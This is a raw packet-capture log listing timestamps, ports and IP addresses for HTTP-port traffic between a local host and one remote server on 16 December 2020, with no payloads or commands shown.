Dec 16, 2020 11:07:34.077131987 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077162027 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077177048 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077199936 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077222109 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077244043 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077263117 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.077275991 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077306032 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077320099 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.077328920 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.077362061 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.235802889 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.235872030 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.235901117 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.235918999 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.235941887 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.235991001 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236048937 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236084938 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236098051 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236160040 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236216068 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236219883 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236254930 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236284971 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236308098 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236358881 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236363888 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236402988 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236442089 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236458063 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236515999 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236517906 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236556053 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236601114 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236646891 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236686945 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236741066 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236785889 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236799002 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236852884 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236895084 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.236938953 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.236952066 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237011909 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.237021923 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237078905 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.237108946 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237176895 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237236023 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.237237930 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237277031 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237293005 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.237337112 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237392902 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.237426996 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237467051 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.237502098 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396011114 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396066904 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396095991 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396136045 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396187067 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396241903 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396246910 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396296978 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396351099 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396353006 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396392107 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396435976 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396450043 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396507025 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396543980 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396568060 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396601915 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396631002 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396668911 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396692991 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396709919 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396765947 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396785975 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396825075 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396850109 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396914959 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.396917105 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.396976948 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397012949 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397012949 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397072077 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397099972 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397130013 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397165060 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397170067 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397222996 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397241116 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397279978 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397306919 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397322893 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397366047 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397377014 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397450924 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397484064 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397485018 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397536039 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397569895 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397587061 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397630930 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397644997 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397686958 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397726059 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397737980 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397774935 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397803068 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397816896 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397855997 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397869110 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397882938 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397922039 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397949934 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.397969007 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.397998095 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398035049 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398071051 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398072004 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398101091 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398135900 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398137093 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398175001 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398200989 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398214102 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398247004 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398288965 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398313999 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398324966 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398351908 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398391008 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398415089 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398427963 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398453951 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398492098 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398526907 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398530960 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398569107 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398607016 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398633957 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.398657084 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.398731947 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557126999 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557167053 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557245016 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557326078 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557377100 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557379961 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557447910 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557488918 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557499886 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557559013 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557594061 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557604074 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557651997 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557657957 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557719946 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557759047 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557761908 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557818890 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557841063 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557878017 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557899952 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557914972 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.557948112 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.557971001 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558057070 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558078051 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558125019 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558161020 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558211088 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558247089 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558259964 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558339119 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558343887 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558398962 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558434963 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558439016 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558486938 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558514118 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558537960 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558571100 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558573008 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558618069 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558621883 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558682919 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558706045 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558725119 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558768988 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558778048 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558835030 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558866978 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558917999 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558952093 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.558964968 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.558993101 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559039116 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559043884 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559134007 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559150934 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559164047 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559199095 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559201002 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559248924 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559278965 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559284925 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559317112 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559329033 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559349060 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559369087 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559396029 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559426069 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559453964 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559484959 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559490919 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559529066 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559555054 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559573889 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559592009 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559639931 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559645891 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559669971 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559708118 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559736013 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559747934 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559776068 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559812069 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559814930 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559850931 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559870005 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559911966 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559942007 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.559961081 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.559977055 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560003042 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560039997 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560075045 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560080051 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560137987 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560168982 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560183048 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560204029 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560223103 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560261965 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560300112 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560302019 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560353041 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560384989 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560389996 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560436964 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560467005 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560486078 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560503960 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560538054 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560555935 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560559988 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560586929 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560590982 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560621023 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560637951 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560667038 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560714960 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560738087 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560738087 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560833931 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560847044 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560889006 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560909986 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.560916901 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560947895 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.560976982 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561012030 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561037064 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561053991 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561090946 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561117887 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561131954 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561156034 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561193943 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561209917 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561218977 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561258078 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561285973 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561304092 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561333895 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561364889 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561371088 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561433077 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561459064 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561460972 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561496973 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561532021 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561534882 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561600924 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561614037 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561641932 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561686993 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561712980 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561747074 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561749935 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561789036 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561803102 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561856031 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561868906 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.561897039 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561935902 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561961889 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.561992884 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.562009096 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562041998 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.562052965 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562071085 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562099934 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562139034 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562151909 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.562166929 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.562221050 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.720496893 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720527887 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720540047 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720551968 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720562935 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720575094 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720652103 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.720696926 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.720896006 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720918894 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720926046 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720937967 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720973969 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.720978022 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.720992088 CET	80	49743	193.56.255.167	192.168.2.5
Dec 16, 2020 11:07:34.721023083 CET	49743	80	192.168.2.5	193.56.255.167
Dec 16, 2020 11:07:34.721030951 CET	49743	80	192.168.2.5	193.56.255.167
